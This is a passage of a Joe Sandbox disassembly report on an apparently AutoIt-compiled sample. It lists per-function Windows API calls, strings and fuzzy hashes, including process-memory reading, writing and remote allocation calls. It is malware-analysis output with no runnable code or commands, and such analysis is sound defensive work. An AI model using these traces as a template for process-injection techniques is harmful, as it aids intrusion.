                                          • Opcode ID: 137296144ebe2a12e04280ffa4fd6d7e032e352c3c20ef120046e33ec2e702ef
                                          • Instruction ID: afd85e6358e80b06e74087909b5bfd4d5081e82a1d3ac43644e113b75f134a23
                                          • Opcode Fuzzy Hash: 137296144ebe2a12e04280ffa4fd6d7e032e352c3c20ef120046e33ec2e702ef
                                          • Instruction Fuzzy Hash: 6DF0143042CA08EFDB155F26EC5CB583BA8AB01326F198224E429881F1CB3499A5FF10
                                          APIs
                                            • Part of subcall function 00920DB6: std::exception::exception.LIBCMT ref: 00920DEC
                                            • Part of subcall function 00920DB6: __CxxThrowException@8.LIBCMT ref: 00920E01
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 00907A51: _memmove.LIBCMT ref: 00907AAB
                                          • __swprintf.LIBCMT ref: 00912ECD
                                          Strings
                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00912D66
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                          • API String ID: 1943609520-557222456
                                          • Opcode ID: a310bc88a86bd08e6631f2ecca2c08a63c74e0f02bc5d5df8a8e2f8d584beeeb
                                          • Instruction ID: 5ea9921bdbf6c6fcebb0df9bd23161fd49ae49d33afc4fe20d6cf4f5f4f4c2fb
                                          • Opcode Fuzzy Hash: a310bc88a86bd08e6631f2ecca2c08a63c74e0f02bc5d5df8a8e2f8d584beeeb
                                          • Instruction Fuzzy Hash: 1A915B716083159FCB14EF24D885EAFB7A8EFC6710F01491DF4959B2A2EA20ED85CB52
                                          APIs
                                            • Part of subcall function 00904750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00904743,?,?,009037AE,?), ref: 00904770
                                          • CoInitialize.OLE32(00000000), ref: 0096B9BB
                                          • CoCreateInstance.OLE32(00992D6C,00000000,00000001,00992BDC,?), ref: 0096B9D4
                                          • CoUninitialize.OLE32 ref: 0096B9F1
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                          • String ID: .lnk
                                          • API String ID: 2126378814-24824748
                                          • Opcode ID: 9ecf3fe8327afa5e91372fc0a85fcebe26c3a50f2aa0e3ad4dfc0e953e947666
                                          • Instruction ID: 3f09611151a22edb6a4c8f0a23e86c4e490c58686649dfc50183685c761353a6
                                          • Opcode Fuzzy Hash: 9ecf3fe8327afa5e91372fc0a85fcebe26c3a50f2aa0e3ad4dfc0e953e947666
                                          • Instruction Fuzzy Hash: A7A16D756043059FCB00DF24C494E6AB7E9FF89324F148958F8999B3A2DB31ED85CB91
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 009250AD
                                            • Part of subcall function 009300F0: __87except.LIBCMT ref: 0093012B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__87except__start
                                          • String ID: pow
                                          • API String ID: 2905807303-2276729525
                                          • Opcode ID: bc589393659b99d306bf8118c5c7d064406b3f874f19eeadb070954ebd227006
                                          • Instruction ID: cf1febe9a00082cf2e4addb9c2c67b62f6908ddb918d897df8bea9f9ae677824
                                          • Opcode Fuzzy Hash: bc589393659b99d306bf8118c5c7d064406b3f874f19eeadb070954ebd227006
                                          • Instruction Fuzzy Hash: 96518B6191C60296DB117768ED2137F2B98DBC0710F208D59E4D9862AEEE38CDD4EF86
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memset$_memmove
                                          • String ID: ERCP
                                          • API String ID: 2532777613-1384759551
                                          • Opcode ID: 9c58146eaf6ae8d36bec6bcc18d782344e3f4ee0bb2bbc618255b5241543e727
                                          • Instruction ID: 4e14594ad80ff8008e77f1e9c08d31567001d6a77b87418efb89b19672f8d3ed
                                          • Opcode Fuzzy Hash: 9c58146eaf6ae8d36bec6bcc18d782344e3f4ee0bb2bbc618255b5241543e727
                                          • Instruction Fuzzy Hash: 2451A071A00709DBDB24CF55C9817EAB7F8EF84314F20496EE95ACB281E774AA85CB40
                                          APIs
                                            • Part of subcall function 009614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00959296,?,?,00000034,00000800,?,00000034), ref: 009614E6
                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0095983F
                                            • Part of subcall function 00961487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 009614B1
                                            • Part of subcall function 009613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00961409
                                            • Part of subcall function 009613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0095925A,00000034,?,?,00001004,00000000,00000000), ref: 00961419
                                            • Part of subcall function 009613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0095925A,00000034,?,?,00001004,00000000,00000000), ref: 0096142F
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009598AC
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009598F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                          • String ID: @
                                          • API String ID: 4150878124-2766056989
                                          • Opcode ID: 81aed6f52e886593873c3189e29499745307a8959d685537400348ab879460c6
                                          • Instruction ID: 05b2407c34f6298608a1f3e27b756934046db131e4ae0f030e4b32fef562407b
                                          • Opcode Fuzzy Hash: 81aed6f52e886593873c3189e29499745307a8959d685537400348ab879460c6
                                          • Instruction Fuzzy Hash: 9F41417690021CBFDB10DFA5CC51BDEBBB8EB45300F144159FA45B7151DA716E89CBA0
                                          APIs
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0098F910,00000000,?,?,?,?), ref: 009879DF
                                          • GetWindowLongW.USER32 ref: 009879FC
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00987A0C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$Long
                                          • String ID: SysTreeView32
                                          • API String ID: 847901565-1698111956
                                          • Opcode ID: 7964d577688ac5fa6e4161811687740410486c37cb60cfee69f2fa08dc3df8cb
                                          • Instruction ID: 845557ef4a6656d69b3c0c7ccd61bf78d973d07710c4938c7ce21ca608180421
                                          • Opcode Fuzzy Hash: 7964d577688ac5fa6e4161811687740410486c37cb60cfee69f2fa08dc3df8cb
                                          • Instruction Fuzzy Hash: 4C31DE31204206AFDB15AF78CC45BEAB7A9EB49324F204725F875A22E0D731E9919B50
                                          APIs
                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00987461
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00987475
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00987499
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: SysMonthCal32
                                          • API String ID: 2326795674-1439706946
                                          • Opcode ID: 9ff1b52418c01271cade3f522bf2588fcb1aabb22fcde47883c4797912423719
                                          • Instruction ID: 368f4a87cdd937dd73c8617fe3c9c3c79f8074484d182bd421d229f6ed85e7fd
                                          • Opcode Fuzzy Hash: 9ff1b52418c01271cade3f522bf2588fcb1aabb22fcde47883c4797912423719
                                          • Instruction Fuzzy Hash: D4219432514218ABDF11DFA4CC46FEA7B6AEB48724F110114FE156B2E0D675EC919B90
                                          APIs
                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00987C4A
                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00987C58
                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00987C5F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$DestroyWindow
                                          • String ID: msctls_updown32
                                          • API String ID: 4014797782-2298589950
                                          • Opcode ID: c7e0c7d8024a8a51b1b419265ee64be2f9b7ee576438f3e8e747a7611c1dd44c
                                          • Instruction ID: 6d366db64b043850b612ed6a44c7474f67061b1c2713036cf49521b0a7553f59
                                          • Opcode Fuzzy Hash: c7e0c7d8024a8a51b1b419265ee64be2f9b7ee576438f3e8e747a7611c1dd44c
                                          • Instruction Fuzzy Hash: 77218EB5604208AFDB10EF64DCC1DA777EDEF59354B240059FA019B3A1CB31EC419B60
                                          APIs
                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00986D3B
                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00986D4B
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00986D70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$MoveWindow
                                          • String ID: Listbox
                                          • API String ID: 3315199576-2633736733
                                          • Opcode ID: 1b718eb6cf45539944f9a698b1045e478b27b70745eff970aac0250f13c9bf84
                                          • Instruction ID: 3ef9270af2df3065f243032678f89ea0c3ab8fb7a0ad18b0b14a83d7b84a83e1
                                          • Opcode Fuzzy Hash: 1b718eb6cf45539944f9a698b1045e478b27b70745eff970aac0250f13c9bf84
                                          • Instruction Fuzzy Hash: C5219232610118BFDF129F54DC45FAB3BBEEF89764F118124FA459B2A0C671AC5197A0
                                          APIs
                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00987772
                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00987787
                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00987794
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: msctls_trackbar32
                                          • API String ID: 3850602802-1010561917
                                          • Opcode ID: ba8e9fbe2b4025f1b8c32842314254b89b873885140cc920bc4e979fa8b2429d
                                          • Instruction ID: dc49755202056b7c644e88677678824f8a1c1f3576d13ed3244b46aedf1c6b19
                                          • Opcode Fuzzy Hash: ba8e9fbe2b4025f1b8c32842314254b89b873885140cc920bc4e979fa8b2429d
                                          • Instruction Fuzzy Hash: 91112732214208BEEF106FA0CC01FEBB76CEF88B54F110118F641921D0C271E851DB20
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00904BD0,?,00904DEF,?,009C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00904C11
                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00904C23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-3689287502
                                          • Opcode ID: c734f3b9bdd0acb7380d2fb7d51b170160ec5b9c05eb1f3bf28f819ebadb8dbf
                                          • Instruction ID: 247d4ac755b6d07a5fa10ba913883e823e8eef19e8cd2f8cc08831e706c62087
                                          • Opcode Fuzzy Hash: c734f3b9bdd0acb7380d2fb7d51b170160ec5b9c05eb1f3bf28f819ebadb8dbf
                                          • Instruction Fuzzy Hash: E1D01270515723CFD7206F71DA1864AB6D9EF09756B119C3994C5D6290E6B0D480C750
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00904B83,?), ref: 00904C44
                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00904C56
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-1355242751
                                          • Opcode ID: c58e192103e10f14e6844f7d843ffd2b204d95b5aaac2475b23313ae86157652
                                          • Instruction ID: adf65b6dc21c8c6d2e20f094dfce97826cb2b7ec2c33bb58cfc061a7e623031b
                                          • Opcode Fuzzy Hash: c58e192103e10f14e6844f7d843ffd2b204d95b5aaac2475b23313ae86157652
                                          • Instruction Fuzzy Hash: FCD01770628723CFE7209F31D91868A76E8AF05765B11983EA5D6D62A4E6B0D8C0CB60
                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00981039), ref: 00980DF5
                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00980E07
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 2574300362-4033151799
                                          • Opcode ID: f9e576d6edf9d2c516c9dde08a966ab8befe60fdf7e204323f213a831b0d31ab
                                          • Instruction ID: 4511f36cce9b5670505b1967353e7f9347179f9153373c66424700a112439004
                                          • Opcode Fuzzy Hash: f9e576d6edf9d2c516c9dde08a966ab8befe60fdf7e204323f213a831b0d31ab
                                          • Instruction Fuzzy Hash: 26D0C730564322CFC320AF70C8086C372E8AF84362F008C3EA982C2250E6B0D890CB00
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00978CF4,?,0098F910), ref: 009790EE
                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00979100
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetModuleHandleExW$kernel32.dll
                                          • API String ID: 2574300362-199464113
                                          • Opcode ID: fc6da62836c45fbc6694b232e46d6b17353c848295234359966b19a9b11aaa72
                                          • Instruction ID: dc3ae96c6ff47a8bf951d46a1c0bb033c95f83a6a49d5a01278374f97f5d5468
                                          • Opcode Fuzzy Hash: fc6da62836c45fbc6694b232e46d6b17353c848295234359966b19a9b11aaa72
                                          • Instruction Fuzzy Hash: A9D0173562C713CFDB209F39D82C64676E8EF05765B52D83A948AD6690EA70C890CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: LocalTime__swprintf
                                          • String ID: %.3d$WIN_XPe
                                          • API String ID: 2070861257-2409531811
                                          • Opcode ID: 7c1971510797de0eec2879eb8e40def4e051e81b6a61ab6dc7162f656da6d904
                                          • Instruction ID: feeffefb7a64c53a4d36a2e767398d4289355eee5aa2709b80c4b89af9279248
                                          • Opcode Fuzzy Hash: 7c1971510797de0eec2879eb8e40def4e051e81b6a61ab6dc7162f656da6d904
                                          • Instruction Fuzzy Hash: 01D017B1858119FBCB109B909889CF973BCAB08311F200962F512A2080E22E9BD4EA25
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • Opcode ID: cd8624c154f385ef04d88fbfb59d87add1ec2ee098373cd5ed0e609f2f9042ae
                                          • Instruction ID: b9c3f88f8408181a5be2d8ab20ad5078d7823f4695b67ad288924d734a586440
                                          • Opcode Fuzzy Hash: cd8624c154f385ef04d88fbfb59d87add1ec2ee098373cd5ed0e609f2f9042ae
                                          • Instruction Fuzzy Hash: 14C16D74A04216EFCB14CFA5D884AAEFBB9FF48711B148598EC05DB261D730DE85DB90
                                          APIs
                                          • CharLowerBuffW.USER32(?,?), ref: 0097E0BE
                                          • CharLowerBuffW.USER32(?,?), ref: 0097E101
                                            • Part of subcall function 0097D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0097D7C5
                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0097E301
                                          • _memmove.LIBCMT ref: 0097E314
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                          • String ID:
                                          • API String ID: 3659485706-0
                                          • Opcode ID: 16feb12a887425d2e4b9266ee0ec83afe1c6e125c510f8c056102a5bfc98befc
                                          • Instruction ID: 0d03cd0b2d7e54b7d33c6f5bac155e53e7e3412057d4682bfd396ae63ec5f548
                                          • Opcode Fuzzy Hash: 16feb12a887425d2e4b9266ee0ec83afe1c6e125c510f8c056102a5bfc98befc
                                          • Instruction Fuzzy Hash: 5CC12972608311DFC714DF28C481A6ABBE4FF89714F14896EF8999B352D731E945CB81
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 009780C3
                                          • CoUninitialize.OLE32 ref: 009780CE
                                            • Part of subcall function 0095D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0095D5D4
                                          • VariantInit.OLEAUT32(?), ref: 009780D9
                                          • VariantClear.OLEAUT32(?), ref: 009783AA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
